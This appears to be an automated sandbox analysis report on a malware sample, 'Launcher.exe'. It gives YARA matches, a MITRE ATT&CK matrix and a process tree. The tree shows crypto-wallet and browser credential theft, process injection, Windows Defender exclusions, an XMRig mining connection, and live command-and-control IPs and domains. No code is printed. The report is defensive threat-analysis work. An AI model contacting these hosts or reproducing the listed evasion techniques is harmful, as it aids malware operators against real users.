Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: Yara match, File source: Process Memory Space: xzuucncwbxucqic.exe PID: 5700, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match, File source: 29.2.xzuucncwbxucqic.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.xzuucncwbxucqic.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000001D.00000002.2494852918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000038.00000003.1865638072.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000038.00000002.1935737498.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001E.00000003.1865565180.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the count shown in that matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 231 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 411 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 211 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 41 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 271 Virtualization/Sandbox Evasion; 411 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 11 File and Directory Discovery; 145 System Information Discovery; 681 Security Software Discovery; 2 Process Discovery; 271 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 31 Data from Local System; 1 Screen Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 11 Ingress Tool Transfer; 21 Encrypted Channel; 11 Non-Standard Port; 3 Non-Application Layer Protocol; 124 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1637040, Sample: Launcher.exe, Startdate: 13/03/2025, Architecture: WINDOWS, Score: 100)

Start
  DNS/IP: xmr-eu1.nanopool.org (DNS related to crypt mining pools); menuedgarli.shop; t.me
  Signatures: Sigma detected: Xmrig; Suricata IDS alerts for network traffic; Found malware configuration; 17 other signatures
  Launcher.exe 4
    DNS/IP: 5.252.153.122 (ports 3000, 49719; WORLDSTREAMNL, Russian Federation); 138.124.55.36 (ports 49722, 49728, 49731; NOKIA-ASFI, Norway); 185.170.153.104 (ports 3000, 49718; NODE4-ASGB, United Kingdom)
    Dropped: C:\Users\user\AppData\...\wxymrnibweqciwn.exe (PE32); C:\Users\user\AppData\...\qzemwxiuzucyxcx.exe (PE32); C:\Users\user\AppData\...\niyrycbicwuyiuc.exe (PE32+); C:\Users\user\AppData\...\xzuucncwbxucqic.exe (PE32)
    Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Adds a directory exclusion to Windows Defender
    xzuucncwbxucqic.exe
      Signatures: Antivirus detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
      xzuucncwbxucqic.exe
        DNS/IP: menuedgarli.shop 104.21.32.1 (ports 443, 49727, 49729; CLOUDFLARENETUS, United States); t.me 149.154.167.99 (ports 443, 49726; TELEGRAMRU, United Kingdom)
        Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
    wxymrnibweqciwn.exe
      Signatures: Query firmware table information (likely to detect VMs); Switches to a custom stack to bypass stack traces; Tries to detect sandboxes / dynamic malware analysis system (registry check)
      svchost.exe
        DNS/IP: 185.236.26.111 (ports 49739, 5968; SOLTIAES, Spain)
        Signatures: System process connects to network (likely due to code injection or exploit); Switches to a custom stack to bypass stack traces
        fontdrvhost.exe
          WerFault.exe
    qzemwxiuzucyxcx.exe
      Dropped: C:\Users\user\...\MicrosoftEdgeUpdate.exe (PE32)
      Signatures: Multi AV Scanner detection for dropped file
      cmd.exe
        Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
        2 other processes
      powershell.exe
        Signatures: Queries memory information (via WMI often done to detect virtual machines)
        conhost.exe
      2 other processes
        conhost.exe
        2 other processes
    7 other processes
      Dropped: C:\ProgramData\...\RuntimeBroker.exe (PE32+)
      Signatures: Sets debug register (to hijack the execution of another thread); Adds a directory exclusion to Windows Defender
      powershell.exe 23
        Signatures: Loading BitLocker PowerShell Module
      powershell.exe 11
      14 other processes
        Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        net1.exe 1
        conhost.exe
        conhost.exe
        3 other processes
  MicrosoftEdgeUpdate.exe
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
  svchost.exe
    Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
    MpCmdRun.exe
      conhost.exe
  9 other processes
    DNS/IP: 51.15.58.224 (OnlineSASFR, France)
    Signatures: Query firmware table information (likely to detect VMs)
    conhost.exe
    WerFault.exe
    conhost.exe
